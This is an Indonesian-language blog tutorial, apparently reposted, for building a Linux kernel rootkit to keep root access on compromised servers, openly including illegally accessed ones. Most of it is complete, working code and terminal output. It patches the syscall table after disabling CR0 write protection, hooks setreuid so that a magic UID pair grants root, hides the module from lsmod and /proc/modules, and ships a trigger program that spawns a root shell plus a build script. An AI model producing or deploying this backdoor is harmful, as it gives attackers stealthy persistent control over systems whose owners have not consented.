10 Sep 2012

Karnel Rootkit


  ROOTKIT: Renyah, Enak, dan Gurih


-----[ Introduction

Jadi begini ceritanya pembaca yang budiman dan budiwati tercinta, pada kali ini
saya mau berbagi sedikit yang saya bisa biarpun masih amatiran begini yang
penting bagi-bagi gitu. Nah, saya yakin banyak diantara pembaca yang budiman
dan budiwati ini sudah ndak asing dan bahkan mungkin saja sudah biasa keluar
masuk server baik legal maupun ilegal bahkan sampe dapet akses root bermodalkan
local exploit atau remote exploit yang dibagi-bagi atau bisa juga 0day sendiri.

Pada tahapan setelah ngeroot itu biasanya sebisa mungkin akses priviledge yang
sudah didapat (root) pokoknya gimanapun caranya kudu dipertahankan. Disinilah
mungkin banyak para pembaca yang budiman dan budiwati ini yang memakai rootkit,
buat jaga-jaga sapa tau password rootnya diganti dan anda sekalian masih bisa
ongkang-ongkang dapet akses rootnya soalnya sudah di backdoor.

Beberapa rootkit yang banyak beredar sudah mumpuni dan woyo, dan pada
kesempatan ini saya mau bagi sedikit rootkit maha bosok saya yang ndak seberapa
ini, dan bagaimana cara membuatnya berdasarkan weton serta fengshui.

-----[ Syscall Hijack

Sebelum memulainya ada baiknya membaca doa sesuai keyakinan masing-masing biar
diridhoi dan dijauhkan dari kesialan. Dan sekedar info saya PoC (Piye om
Carane) ini di linux kernel 2.6.38, belum ada kesempatan nyoba di kernel kepala
3.x.x jadi kalo ndak jalan ya maklum namanya juga rootkit maha bosok.

Metode penanaman rootkit ada beberapa cara, umumnya biasanya menggunakan metode
memperkosa syscall. Syscall itu sendiri adalah mekanisme dan aturan bagaimana
sebuah program merequest service dari inti sistem operasi yang dalam hal ini
adalah kernel, service yang dipegang ini bisa berupa hal-hal yang berhubungan
dengan hardware komputer, create dan execute proses, dan berkomunikasi (nyepik)
dengan internal kernel. Wooogh ndak perlu buru-buru ruwet, ini istilahnya cuma
nyepikin kernel, kalo anda sekalian sudah biasa nyepikin cewek/cowok maka ndak
jauh bedalah, ndak wow kk wow kok, simpel sebenernya.

Nah metode memperkosa syscall ini atau bahasa kerennya hijacking syscall
biasanya menggunakan skenario seperti ini : 
    1. Mengakses syscall table
    2. Bypass Kernel Write Protection
    3. Bypass CR0 Protection
    4. Hiding Kernel Module

Skenario diatas untungnya disediakan semua sama kernelnya, baek bener khan si
kernel ini. Beda dengan syscall proxying, atau GDT Hooking yang maha njelimet,
karena keterbatasan isi kepala saya maka saya pilih saja ini syscall hijack
selain karena murah dan aman, juga lebih manusiawi.

Kita mulai masuk kedalam skenario mengakses syscall tablenya. Ada banyak cara
yang dapat digunakan untuk mengetahui memory address syscall table. Yang paling
mudah adalah mencarinya langsung di dalam "System.map" yang ada di direktori
/boot.

Ex.
stnmrshx@monyet:~$ sudo cat /boot/System.map-2.6.38-13-generic
...
c19175c4 b br_ioctl_hook
c19175c8 b vlan_ioctl_hook
c19175cc b dlci_ioctl_hook
c19175d0 b warned.41013
c1917600 b proto_inuse_idx
...
stnmrshx@monyet:~$

Nah banyak bener khan, itu semua symbol dan address yang digunakan oleh kernel
untuk mengatur dan memetakan keseluruhan sistem operasi. Yang kita butuhkan
cuma mengetahui memory address syscall table di dalam System.map jadi cukup
begini aja :

Ex.
stnmrshx@monyet:~$ sudo cat /boot/System.map-2.6.38-13-generic | grep sys_call_table
c1513160 R sys_call_table
stnmrshx@monyet:~$ 

Nah nongol deh, berarti alamat memory address nya syscall table itu berada di
c1513160, catet bro en sis.

Skenario pertama sakses, selanjutnya skenario kedua yaitu Bypass Kernel Write
Protection. Ibaratnya nyepik atau ngedeketin cewek/cowok gebetan ini bisa
disamakan dengan ngedeketin temen gebetan anda sekalian gitu biar aksesnya
mudah. Dan biasanya lagi temen gebetan anda bakalan ngasih akses alias
memudahkan jalan anda khan. Begitu juga dengan kernel ini, dia ngasih jalan kok
yaitu dengan dua task function spesialnya itu :

void (*pages_rw)(struct page *page, int numpages) =  (void *) 0xaddress_pages_rw;
void (*pages_ro)(struct page *page, int numpages) =  (void *) 0xaddress_pages_ro;

Task Function yang menggunakan address_pages_rw ini punya kemampuan untuk
mengeset "write mode" atau kemampuan menulis kernel page berdasarkan argumen,
sedangkan yang menggunakan address_pages_ro punya kemampuan untuk mengeset
"read mode" kernel page berdasarkan argumen yang diberikan. Namun, untuk itu
kita (kita??? elo aja kali sama temen-temen elo yang pangky-pangky) perlu
mengetahui dan mendayagunakan virtual address dari page yang bakalan kita
obok-obok tersebut. Dalam hal ini kernel pun berbaik hati memberikan satu
function lagi yang bisa kita gunakan yaitu "virt_to_page()" function yang
fungsinya mengkonversi virtual address dari page yang berkaitan dengan physical
page memory yang disediakan kernel. Ruwet? Ya sudah ndak apa-apa saya juga
ruwet kok ahahahaha. Nah untuk mengetahui alamat pages_rw dan pages_ro nya bisa
diketahui dengan menggunakan cara yang sama kayak yang pertama tadi cuma beda
tipis aja :

stnmrshx@monyet:~$ sudo cat /boot/System.map-2.6.38-13-generic | grep -e pages_rw -e pages_ro
c10308b0 T set_pages_ro
c10308d0 T set_pages_rw
stnmrshx@monyet:~$

Oke dapet khan alamatnya pages_ro dan pages_rw nya, jadi lengkapnya functionnya
kayak gini setelah alamatnya disisipkan :

void (*pages_rw)(struct page *page, int numpages) =  (void *) 0xc10308d0;
void (*pages_ro)(struct page *page, int numpages) =  (void *) 0xc10308b0;

Syiiip, sudah siyap nih jadinya kita, saya, dan anda para pembaca budiman dan
budiwati bisa mengakses dan memodifikasi syscall table dengan cara ini :

-----*snip*------
| ...
| 
| unsigned long *syscall_table = (unsigned long *)0xc1513160; //alamat memory address syscall table 
| 
| void (*pages_rw)(struct page *page, int numpages) =  (void *) 0xc10308d0; //address pages_rw
| void (*pages_ro)(struct page *page, int numpages) =  (void *) 0xc10308b0; //address pages_ro
| 
| static int init(void)
| {
| 
|    struct page *_sys_call_page;
|    printk(KERN_ALERT "\nMODIF INIT\n");
|
|    _sys_call_page = virt_to_page(&syscall_table); //konversi pake virt_to_page
|
|    pages_rw(_sys_call_page, 1);
|
|    ...
|}
-----*snip*------

Nah skenario Bypass kernel write protection sudah selesai. Lanjut ke Bypass cr0
Protectionnya. Sekedar informasi dan biar ndak dianggap HOAX, beberapa CPU
menerapkan 0-bit di CR atau Control Register ini diset dalam keadaan 0 yang
artinya secara default dalam keadaan protected mode aktif. CR0 ini
sepengetahuan saya yang ndak seberapa ini ada pada CPU yang berarsitektur x86,
untuk yang x64 kurang tau deh saya ndak sempet ngecek. Dan untuk yang pake
Virtual CPU (kayak VPS dan kawan-kawannya) juga ndak ada CR0, sepengetahuan
saya loooh, kalo salah ya mohon diralat mwach mwach :*

Untuk mengetahui apakah CPU nya secara default dalam keadaan protected mode
aktif bisa diketahui dengan cara seperti ini :

Ex.
stnmrshx@monyet:~$ cat /proc/cpuinfo | grep wp
wp  : yes
wp  : yes
stnmrshx@monyet:~$ 

Woooogh kata nya "yes" berarti CPU saya defaultnya protected mode aktif. Nah
beruntungnya kernel memberikan akses untuk kita bypass cr0 protectionnya (ihk
baek banget sih kernel ini ciyum loh :-*) yaitu dengan dua function juga :

static inline unsigned long native_read_cr0 (void)
{
         unsigned long val;
         asm volatile("movl %%cr0,%0\n\t" :"=r" (val));
         return val;
}

static inline void native_write_cr0 (unsigned long val)
{
         asm volatile("movl %0,%%cr0": :"r" (val));
} 


Function read_cr0 memberikan nilai dari register CR0nya, sedangkan function
write_cr0 mengeset bit dari registernya berdasarkan nilai yang ditentukan oleh
parameter. Jadi sekarang kita bisa mengaktifkan dan nonaktifkan protected mode
dengan cara seperti ini :

write_cr0 (read_cr0 () & (~ 0x10000)); //disable protected mode

write_cr0 (read_cr0 () | 0x10000); //enable protected mode

Bypass CR0 Protection sudah berarti tinggal skenario yang terakhir ini, yaitu
menyembunyikan nya dari lsmod dan /proc/modules. Kalau rkhunter atau chkrootkit
saya ndak ngetes, paling-paling ya ketahuan soalnya ini khan sederhananya saja
gitu.

Untuk Hiding Kernel Module ini  dengan cara mudah yaitu dengan menambahkan
baris function ini :

static int init(void) {

    list_del_init(&__this_module.list);

    return 0;
}

static void exit(void) {

    return;
}

Kok bisa? ya bisa dong soalnya function list_del_init() itu didefinisikan begini :

static inline void list_del_init (struct list_head * entry)
{
  __list_del (entry->prev, entry->next);
  INIT_LIST_HEAD (entry);
}

Dan ditempat lainnya __list_del() dan INIT_LIST_HEAD() function didefinisikan
kayak begini :

static inline void __list_del (struct list_head * prev, struct list_head * next)
{
  next-> prev = prev;
  prev-> next = next;
}

static inline void INIT_LIST_HEAD (struct list_head * list)
{
  list-> next = list;
  list-> prev = list;
}

Jadi function list_del_init() menghilangkan nama dari module yang di link
ganda, sehinggaaaaa dengan cara ini module nya ndak kebaca di lsmod dan
/proc/modules.

Simpel khan, ya jangan dibandingin mas dan mbak sama rootkit peropesional yang
banyak beredar diluar sana, maklum ini mah simpel saja kok.  

Nah berarti lengkapnya sekerip yang dibuat jadinya seperti ini setelah
digabungkan dengan bypass kernel write protection, bypass cr0 protection dan
hiding process jadinya begini :

-----*snip*-----
| #include <linux/init.h>
| #include <linux/module.h>
| #include <linux/kernel.h> 
| #include <linux/errno.h> 
| #include <linux/types.h>
| #include <linux/unistd.h>
| #include <asm/cacheflush.h>  
| #include <asm/page.h>  
| #include <asm/current.h>
| #include <linux/sched.h>
| #include <linux/kallsyms.h>
| 
| unsigned long *syscall_table = (unsigned long *)0xc1513160; //alamat syscall table
| asmlinkage int (*original_write)(unsigned int, const char __user *, size_t);
| asmlinkage int new_write(unsigned int fd, const char __user *buf, size_t count) {
|  printk(KERN_ALERT "WRITE HIJACKED");
|  return (*original_write)(fd, buf, count);
| }
|
| static int init(void) {
|  list_del_init(&__this_module.list); // hiding process
|  printk(KERN_ALERT "\nHIJACK INIT\n");
| write_cr0 (read_cr0 () & (~ 0x10000));
| original_write = (void *)syscall_table[__NR_write];
|  syscall_table[__NR_write] = new_write;  
|  write_cr0 (read_cr0 () | 0x10000);
|  return 0;
| }
| 
| static void exit(void) {
| write_cr0 (read_cr0 () & (~ 0x10000));
|  syscall_table[__NR_write] = original_write;  
|  write_cr0 (read_cr0 () | 0x10000);
|  printk(KERN_ALERT "MODULE EXIT\n");
|  return;
| }
| 
| module_init(init);
| module_exit(exit);
|
----*snip*----

Sekarang dicoba mas bero, save as "testbero.c" terus bikin Makefilenya :

----*snip*----

obj-m := testbero.o

KDIR    := /lib/modules/$(shell uname -r)/build
PWD    := $(shell pwd)

default:
 $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

----*snip*----- 

Daaaan kita coba yes :)

stnmrshx@monyet:~/Desktop/simplarootkit$ ls
Makefile  testbero.c
stnmrshx@monyet:~/Desktop/simplarootkit$ make
make -C /lib/modules/2.6.38-13-generic/build SUBDIRS=/home/stnmrshx/Desktop/simplarootkit modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.38-13-generic'
  CC [M]  /home/stnmrshx/Desktop/simplarootkit/testbero.o
/home/stnmrshx/Desktop/simplarootkit/testbero.c: In function ‘init’:
/home/stnmrshx/Desktop/simplarootkit/testbero.c:25:28: warning: assignment makes integer from pointer without a cast
/home/stnmrshx/Desktop/simplarootkit/testbero.c: In function ‘exit’:
/home/stnmrshx/Desktop/simplarootkit/testbero.c:32:28: warning: assignment makes integer from pointer without a cast
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/stnmrshx/Desktop/simplarootkit/testbero.mod.o
  LD [M]  /home/stnmrshx/Desktop/simplarootkit/testbero.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.38-13-generic'
stnmrshx@monyet:~/Desktop/simplarootkit$ sudo insmod testbero.ko
stnmrshx@monyet:~/Desktop/simplarootkit$
stnmrshx@monyet:~/Desktop/simplarootkit$ lsmod | grep testbero
stnmrshx@monyet:~/Desktop/simplarootkit$
stnmrshx@monyet:~/Desktop/simplarootkit$ cat /proc/modules | grep testbero
stnmrshx@monyet:~/Desktop/simplarootkit$

Uyeeeee gak ketauan. Nah berarti dasar-dasar syscall hijackingnya sudah bisa
khan. Sekarang mulai masuk ke dalam rootkitnya.

-----[ Mari Merakit Biar Maknyos

Pertama-tama yang perlu di pahami adalah proses rootkit yang maha bosok ini
menggunakan metode "mengganti proses credential menggunakan kernel module".
Untuk itu perlu kiranya kita mengetahui informasi apa saja yang ada di dalam
task_struct dan bagaimana cara mengakses proses credentialnya biar yang dari
user biasa jadi root setelah trigerring dan execute rootkitnya. Seluruh proses
credential dan cara kerja serta bagaimana mengaksesnya terdapat di source
kernel linux/cred.h dan bisa dilihat sendiri mau lewat gitweb atau lewat
/usr/src/ kernel anda sendiri. Struktur cred yang didefinisikan didalam
linux/cred.h ini antara lain adalah :

struct cred {
 ...
 uid_t  uid;  /* real UID of the task */
 gid_t  gid;  /* real GID of the task */
 uid_t  suid;  /* saved UID of the task */
 gid_t  sgid;  /* saved GID of the task */
 uid_t  euid;  /* effective UID of the task */
 gid_t  egid;  /* effective GID of the task */
 uid_t  fsuid;  /* UID for VFS ops */
 gid_t  fsgid;  /* GID for VFS ops */
 ...

Dengan define cred yang seperti itu kita dapat memodifikasi proses
credentialnya dengan cara seperti ini :

----*snip*----
|
| struct cred *new;
| new = prepare_creds();
| if ( new != NULL )
| {
|  new->uid = new->gid = 0;
|  new->euid = new->egid = 0;
|  new->suid = new->sgid = 0;
|  new->fsuid = new->fsgid = 0;
|  commit_creds(new);
| }
|
----*snip*----

Nah sekarang penjelasannya, function prepare_creds() ini mengunci proses
current->cred_replace_mutex dan kemudian mengalokasikan serta membangun
duplikat dari proses credential yang sedang berjalan. Proses credentials yang
sedang berjalan tersebut kemudian dikembalikan lagi dengan posisi mutex yang
masih terkunci jika berhasil. Dan nilainya akan menjadi NULL jika proses
pengembaliannya tidak berhasil.

Sedangkan function commit_creds() ini akan mengubah beberapa aspek yang
digunakan oleh proses credential dan kemudian akan menggunakan function
rcu_assign_pointer untuk kemudian menggantikan credentials yang baru menjadi
current->cred. Function ini akan membuka current->cred_replace_mutex yang
tadinya dikunci dan memberikan akses ptrace() untuk mengambil posisi dan
terakhir menotifikasi scheduler di kernel jika terjadi perubahan.

Bingung ya? Buat lebih jelasnya bisa baca disini
http://www.mjmwired.net/kernel/Documentation/credentials.txt yang memuat
perubahan credentialsnya.

Jadi, kita sudah mendapatkan cukup informasi untuk membuat rootkit kita.
Rootkit maha bosok kita ini akan memberikan akses root credentials jika kita
meminta shell dengan misalnya RUID == 7130 dan EUID == 0317. Yang perlu kita
lakukan adalah cukup dengan membajak syscall table __NR_setreuid32 kemudian
mengecek RUID dan EUID nya. 

Nah jadi semua dependensi sudah terpenuhi khan, alamat syscall table sudah
didapat, bypass kernel write protection sudah, bypass cr0 protected sudah, dan
hiding sudah. Sekarang dengan menambah task_struct baru untuk mengeset
credentials nya maka rootkit maha bosok kita akan jadi seperti ini :

-----*snip*-----
| stnmrshx@monyet:~/Desktop/simplarootkit$ cat mahabosok.c
| 
| #include <linux/init.h>
| #include <linux/module.h>
| #include <linux/kernel.h>
| #include <linux/errno.h>
| #include <linux/version.h>
| #include <linux/types.h>
| #include <linux/unistd.h>
| #include <asm/cacheflush.h>
| #include <asm/page.h>
| #include <linux/sched.h>
| #include <linux/kallsyms.h>
|
| unsigned long *syscall_table = (unsigned long *)0xc1513160; //alamat syscall table
| asmlinkage int (* orig_setreuid) (uid_t ruid, uid_t euid);
| asmlinkage int new_setreuid (uid_t ruid, uid_t euid)
| {
|  struct cred *new;
|  if ((ruid == 7130) && (euid == 0317)) //contoh ruid sama euidnya saja
|  {
|   printk(KERN_ALERT "[Valid] \n");
| 
|   new = prepare_creds();
|   if ( new != NULL )
|   {
|    new->uid = new->gid = 0;
|    new->euid = new->egid = 0;
|    new->suid = new->sgid = 0;
|    new->fsuid = new->fsgid = 0;
|    commit_creds(new);
|   }
|   return orig_setreuid (0, 0);
|  }
|  return orig_setreuid (ruid, euid);
| }
| 
| static int init(void)
| {
|  list_del_init(&__this_module.list); // hiding process
| printk(KERN_ALERT "\nHIJACK INIT\n");
| write_cr0 (read_cr0 () & (~ 0x10000));
| orig_setreuid = syscall_table [__NR_setreuid32];
| syscall_table [__NR_setreuid32] = new_setreuid;
| write_cr0 (read_cr0 () | 0x10000);
| return 0;
| }
|
| static void exit(void)
| {
| write_cr0 (read_cr0 () & (~ 0x10000));
| syscall_table[__NR_setreuid32] = orig_setreuid;
| write_cr0 (read_cr0 () | 0x10000);
| printk(KERN_ALERT "MODULE EXIT\n");
| return;
| }
|
| module_init(init);
| module_exit(exit);
|
----*snip*----

----*snip*----
stnmrshx@monyet:~/Desktop/simplarootkit$ cat Makefile

obj-m := mahabosok.o

KDIR    := /lib/modules/$(shell uname -r)/build
PWD    := $(shell pwd)

default:
 $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

----*snip*----

----*snip*----
| stnmrshx@monyet:~/Desktop/simplarootkit$ cat colok.c
|
| #include <stdio.h>
| int main ()
| {
| setreuid (7130, 0317);
| system ("/bin/sh");
| return 0;
| }
|
----*snip*----

Compile dulu modulenya pake Makefile :

stnmrshx@monyet:~/Desktop/simplarootkit$ make
make -C /lib/modules/2.6.38-13-generic/build SUBDIRS=/home/stnmrshx/Desktop/simplarootkit modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.38-13-generic'
  CC [M]  /home/stnmrshx/Desktop/simplarootkit/mahabosok.o
/home/stnmrshx/Desktop/simplarootkit/mahabosok.c: In function ‘init’:
/home/stnmrshx/Desktop/simplarootkit/mahabosok.c:41:16: warning: assignment makes pointer from integer without a cast
/home/stnmrshx/Desktop/simplarootkit/mahabosok.c:42:34: warning: assignment makes integer from pointer without a cast
/home/stnmrshx/Desktop/simplarootkit/mahabosok.c: In function ‘exit’:
/home/stnmrshx/Desktop/simplarootkit/mahabosok.c:50:33: warning: assignment makes integer from pointer without a cast
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/stnmrshx/Desktop/simplarootkit/mahabosok.mod.o
  LD [M]  /home/stnmrshx/Desktop/simplarootkit/mahabosok.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.38-13-generic'
stnmrshx@monyet:~/Desktop/simplarootkit$

Kemudian pasang rootkitnya :

stnmrshx@monyet:~/Desktop/simplarootkit$ sudo insmod mahabosok.ko
stnmrshx@monyet:~/Desktop/simplarootkit$

Cek dulu apa sudah hiding atau belum itu rootkit maha bosoknya :

stnmrshx@monyet:~/Desktop/simplarootkit$ lsmod | grep mahabosok
stnmrshx@monyet:~/Desktop/simplarootkit$

Sip dan terakhir compile trigger buat executenya :

stnmrshx@monyet:~/Desktop/simplarootkit$ gcc colok.c -o colok

Dan Eksekusi juragan!!!

stnmrshx@monyet:~/Desktop/simplarootkit$ ./colok
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),46(plugdev),112(lpadmin),120(admin),122(sambashare),1000(stnmrshx)
#
# whoami
root
#

Sip berjalan sakses deh rootkitnya, jadi andaikata password rootnya diganti
atau lupa ya gpp, selama rootkitnya tetep kepasang masih bisa diakses.

-----[ Dynamic Syscall Table

Nah ternyata ada pertanyaan kayak gini nih. Bisa nggak sih kita dapetin memory
address syscall table secara dinamik? Mungkin saja kalo di komputer saya yang
bosok juga ini kecatetnya c1513160 dan di komputer lain bisa jadi c1512130,
kalo beda khan susaaa paaaaaaak. Otentu bisa para pembaca yang budiman dan
budiwati. Seperti yang saya bilang diawal-awal paper ini, ada banyak cara untuk
mengetahui memory address syscall table, yang saya contohin pertama diatas itu
cuma satu contoh simpel saja. Nah cara yang agak simpel lainnya untuk mencari
memory address syscall table secara dinamik bisa dengan menggunakan fitur shell
yang sederhana seperti ini : 

stnmrshx@monyet:~/Desktop/simplarootkit$ sudo grep sys_call_table /boot/System.map-$(uname -r) | awk '{print $1}'
c1513160
stnmrshx@monyet:~/Desktop/simplarootkit$ 

Sehingga yang perlu dilakukan adalah dengan membuat sebuah file bash executable
(compile.sh) yang memiliki tugas :
    1. mencari memory address syscall table.
    2. memasukkannya kedalam source rootkit maha bosok kita.
    3. menjalankan Makefile

Jadi kayak begini deh...

----*snip*----
|
| #!/bin/bash
|
| ADDRESNYO=$(grep sys_call_table /boot/System.map-$(uname -r) |awk '{print $1}')
| sed -i s/ADDRESNYO/$ADDRESNYO/g mahabosok.c
|
| make
|
----*snip*----

Dan untuk mahabosok.c nya diubah dikit aja pas bagian memory address syscall
table nya :

----*snip*----
|
| #include <linux/init.h>
| #include <linux/module.h>
| #include <linux/kernel.h>
| #include <linux/errno.h>
| #include <linux/version.h>
| #include <linux/types.h>
| #include <linux/unistd.h>
| #include <asm/cacheflush.h>
| #include <asm/page.h>
| #include <linux/sched.h>
| #include <linux/kallsyms.h>
|
| unsigned long *syscall_table = (unsigned long *)0xADDRESSNYO; //alamat syscall table addressnyo
| asmlinkage int (* orig_setreuid) (uid_t ruid, uid_t euid);
| asmlinkage int new_setreuid (uid_t ruid, uid_t euid)
| {
| struct cred *new;
| if ((ruid == 7130) && (euid == 0317)) //contoh ruid sama euidnya saja
| {
|  printk(KERN_ALERT "[Valid] \n");
|
|  new = prepare_creds();
|  if ( new != NULL )
|  {
|   new->uid = new->gid = 0;
|   new->euid = new->egid = 0;
|   new->suid = new->sgid = 0;
|   new->fsuid = new->fsgid = 0;
|   commit_creds(new);
|  }
|  return orig_setreuid (0, 0);
| }
| return orig_setreuid (ruid, euid);
| }
|
| static int init(void)
| {
| list_del_init(&__this_module.list); // hiding process
| printk(KERN_ALERT "\nHIJACK INIT\n");
| write_cr0 (read_cr0 () & (~ 0x10000));
| orig_setreuid = syscall_table [__NR_setreuid32];
| syscall_table [__NR_setreuid32] = new_setreuid;
| write_cr0 (read_cr0 () | 0x10000);
| return 0;
| }
|
| static void exit(void)
| {
|  write_cr0 (read_cr0 () & (~ 0x10000));
| syscall_table[__NR_setreuid32] = orig_setreuid;
| write_cr0 (read_cr0 () | 0x10000);
| printk(KERN_ALERT "MODULE EXIT\n");
| return;
| }
|
| module_init(init);
| module_exit(exit);
|
----*snip*----

Kita jalanin yuk biar bertambah 70% ketampanan kita semua ihik X))

stnmrshx@monyet:~/Desktop/simplarootkit$ ./compile.sh
make -C /lib/modules/2.6.38-13-generic/build SUBDIRS=/home/stnmrshx/Desktop/simplarootkit modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.38-13-generic'
  CC [M]  /home/stnmrshx/Desktop/simplarootkit/mahabosok.o
/home/stnmrshx/Desktop/simplarootkit/mahabosok.c: In function ‘init’:
/home/stnmrshx/Desktop/simplarootkit/mahabosok.c:41:16: warning: assignment makes pointer from integer without a cast
/home/stnmrshx/Desktop/simplarootkit/mahabosok.c:42:34: warning: assignment makes integer from pointer without a cast
/home/stnmrshx/Desktop/simplarootkit/mahabosok.c: In function ‘exit’:
/home/stnmrshx/Desktop/simplarootkit/mahabosok.c:50:33: warning: assignment makes integer from pointer without a cast
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/stnmrshx/Desktop/simplarootkit/mahabosok.mod.o
  LD [M]  /home/stnmrshx/Desktop/simplarootkit/mahabosok.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.38-13-generic'
stnmrshx@monyet:~/Desktop/simplarootkit$ 

Dengan menggunakan fitur sed kita mengganti nilai ADDRESSNYO secara otomatis
pada saat compiling module mahabosoknya. Kalau di grep file mahabosok.c nya pun
jadi berubah kayak gini memory addressnya :

stnmrshx@monyet:~/Desktop/simplarootkit$ cat mahabosok.c | grep *syscall_table
unsigned long *syscall_table = (unsigned long *)0xc1513160; //alamat syscall table
stnmrshx@monyet:~/Desktop/simplarootkit$

Cara diatas bisa dikatakan cara yang mudah sekali dan efisien mantep dan
sebagainya. Ada banyak mungkin cara yang dapat digunakan, tapi karena
keterbatasan waktu dan mepetnya deadline saya rasa ini saja cukup.

-----[ Penutup

Hnaaah dengan begini sudah jadilah kernel rootkit kita yang maha bosok dan maha
sederhana ini. Harap maklum yes kalo rootkitnya ndak keren ndak bisa jalan di
trotoar, namanya juga saya masih amatiran, cuma kepingin berbagi sajah ihik
ihik X)). Dan saya ndak bisa  





Sumber  Klik Here

Terimakasih telah membaca artikel Karnel Rootkit,semoga bermanfaat!

orang ganteng mengatakan...

komentar pertamax dan terakir ane amankan gan ... :D

junotz mengatakan...

:D Makasih Yah Orang Ganteng

Berlangganan FEED via email

----------welcome to blog gila----------

Karnel Rootkit

Copyright  © Blog GILA- Blog GIla - - All Right Reserved. | Theme Edited by junotz

Berbagai Tips Dan Tutorial Gratis | Tips tutorial Gratis